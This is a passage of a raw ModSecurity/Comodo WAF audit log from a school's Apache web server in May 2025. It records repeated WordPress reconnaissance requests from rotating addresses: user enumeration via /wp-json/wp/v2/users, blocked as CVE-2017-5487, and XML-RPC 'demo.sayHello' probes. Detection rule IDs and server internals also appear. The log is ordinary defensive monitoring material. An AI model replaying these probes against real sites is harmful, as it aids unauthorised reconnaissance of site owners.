X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --863d4420-C-- demo.sayHello --863d4420-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --863d4420-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495844879309 5700 (- - -) Stopwatch2: 1747495844879309 5700; combined=4174, p1=548, p2=3402, p3=35, p4=35, p5=92, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --863d4420-Z-- --63fda910-A-- [17/May/2025:22:30:56 +0700] aCirsBKi5m5upc8uMd4TVAAAAME 103.236.140.4 56850 103.236.140.4 8181 --63fda910-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63fda910-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63fda910-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495856500756 2479 (- - -) Stopwatch2: 1747495856500756 2479; combined=1295, p1=389, p2=877, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63fda910-Z-- --cad9cf7a-A-- [17/May/2025:22:31:02 +0700] aCirtgTOsBn9MSWb6WLPowAAAIQ 103.236.140.4 56990 103.236.140.4 8181 --cad9cf7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.227 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cad9cf7a-C-- demo.sayHello --cad9cf7a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cad9cf7a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495862685916 5916 (- - -) Stopwatch2: 1747495862685916 5916; combined=4345, p1=560, p2=3540, p3=68, p4=38, p5=82, sr=73, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cad9cf7a-Z-- --3c25404c-A-- [17/May/2025:22:31:41 +0700] aCir3RKi5m5upc8uMd4T3AAAAMY 103.236.140.4 57768 103.236.140.4 8181 --3c25404c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3c25404c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c25404c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495901036572 2743 (- - -) Stopwatch2: 1747495901036572 2743; combined=1258, p1=408, p2=821, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c25404c-Z-- --faf54250-A-- [17/May/2025:22:31:45 +0700] aCir4XyxdQCiyU1ENFedQwAAAAU 103.236.140.4 57884 103.236.140.4 8181 --faf54250-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.141 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --faf54250-C-- demo.sayHello --faf54250-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --faf54250-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495905880347 4579 (- - -) Stopwatch2: 1747495905880347 4579; combined=3447, p1=438, p2=2825, p3=27, p4=29, p5=76, sr=57, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faf54250-Z-- --2032be1b-A-- [17/May/2025:22:32:22 +0700] aCisBum4kjNN-hEbWjKfagAAAE0 103.236.140.4 58628 103.236.140.4 8181 --2032be1b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2032be1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2032be1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495942350573 2465 (- - -) Stopwatch2: 1747495942350573 2465; combined=1422, p1=445, p2=945, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2032be1b-Z-- --7bfe1f7f-A-- [17/May/2025:22:32:32 +0700] aCisEHyxdQCiyU1ENFedaQAAAAU 103.236.140.4 58828 103.236.140.4 8181 --7bfe1f7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.128 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7bfe1f7f-C-- demo.sayHello --7bfe1f7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bfe1f7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495952075119 6466 (- - -) Stopwatch2: 1747495952075119 6466; combined=4707, p1=603, p2=3844, p3=39, p4=43, p5=105, sr=74, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bfe1f7f-Z-- --423df23d-A-- [17/May/2025:22:32:41 +0700] aCisGXyxdQCiyU1ENFeddgAAAAU 103.236.140.4 59008 103.236.140.4 8181 --423df23d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --423df23d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --423df23d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495961067483 2497 (- - -) Stopwatch2: 1747495961067483 2497; combined=1391, p1=451, p2=908, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --423df23d-Z-- --22806815-A-- [17/May/2025:22:32:51 +0700] aCisIwTOsBn9MSWb6WLQAgAAAIE 103.236.140.4 59216 103.236.140.4 8181 --22806815-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --22806815-C-- demo.sayHello --22806815-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --22806815-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495971527522 5666 (- - -) Stopwatch2: 1747495971527522 5666; combined=4231, p1=546, p2=3456, p3=32, p4=36, p5=95, sr=77, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22806815-Z-- --19430603-A-- [17/May/2025:22:33:35 +0700] aCisTxKi5m5upc8uMd4U7wAAANY 103.236.140.4 59988 103.236.140.4 8181 --19430603-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --19430603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19430603-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496015616642 2763 (- - -) Stopwatch2: 1747496015616642 2763; combined=1254, p1=409, p2=816, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19430603-Z-- --f9f8ae65-A-- [17/May/2025:22:33:44 +0700] aCisWBKi5m5upc8uMd4VAAAAAMk 103.236.140.4 60164 103.236.140.4 8181 --f9f8ae65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9f8ae65-C-- demo.sayHello --f9f8ae65-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9f8ae65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496024852107 5412 (- - -) Stopwatch2: 1747496024852107 5412; combined=4131, p1=521, p2=3372, p3=32, p4=35, p5=100, sr=72, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9f8ae65-Z-- --c48a2366-A-- [17/May/2025:22:34:06 +0700] aCisbnyxdQCiyU1ENFedtwAAAAY 103.236.140.4 60560 103.236.140.4 8181 --c48a2366-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c48a2366-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c48a2366-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496046407353 2341 (- - -) Stopwatch2: 1747496046407353 2341; combined=1197, p1=399, p2=770, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c48a2366-Z-- --a236ac65-A-- [17/May/2025:22:34:06 +0700] aCisbnyxdQCiyU1ENFeduAAAAAA 103.236.140.4 60562 103.236.140.4 8181 --a236ac65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a236ac65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a236ac65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496046452947 2531 (- - -) Stopwatch2: 1747496046452947 2531; combined=1129, p1=411, p2=692, p3=0, p4=0, p5=26, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a236ac65-Z-- --073cc169-A-- [17/May/2025:22:34:06 +0700] aCisbnyxdQCiyU1ENFeduQAAAAI 103.236.140.4 60564 103.236.140.4 8181 --073cc169-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --073cc169-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --073cc169-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496046455351 1707 (- - -) Stopwatch2: 1747496046455351 1707; combined=868, p1=273, p2=572, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --073cc169-Z-- --a5a51229-A-- [17/May/2025:22:34:11 +0700] aCiscwTOsBn9MSWb6WLQYQAAAJE 103.236.140.4 60664 103.236.140.4 8181 --a5a51229-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.31 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5a51229-C-- demo.sayHello --a5a51229-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5a51229-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496051418934 5728 (- - -) Stopwatch2: 1747496051418934 5728; combined=4238, p1=574, p2=3434, p3=35, p4=36, p5=94, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5a51229-Z-- --f9b16e1e-A-- [17/May/2025:22:34:11 +0700] aCisc3yxdQCiyU1ENFedwgAAAAk 103.236.140.4 60666 103.236.140.4 8181 --f9b16e1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9b16e1e-C-- demo.sayHello --f9b16e1e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9b16e1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496051421357 5853 (- - -) Stopwatch2: 1747496051421357 5853; combined=4392, p1=533, p2=3614, p3=49, p4=32, p5=96, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9b16e1e-Z-- --89fbb637-A-- [17/May/2025:22:34:11 +0700] aCisc3yxdQCiyU1ENFedwwAAABg 103.236.140.4 60668 103.236.140.4 8181 --89fbb637-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.146 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --89fbb637-C-- demo.sayHello --89fbb637-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --89fbb637-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496051426079 4456 (- - -) Stopwatch2: 1747496051426079 4456; combined=3547, p1=450, p2=2867, p3=32, p4=23, p5=100, sr=75, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89fbb637-Z-- --42f9610b-A-- [17/May/2025:22:34:32 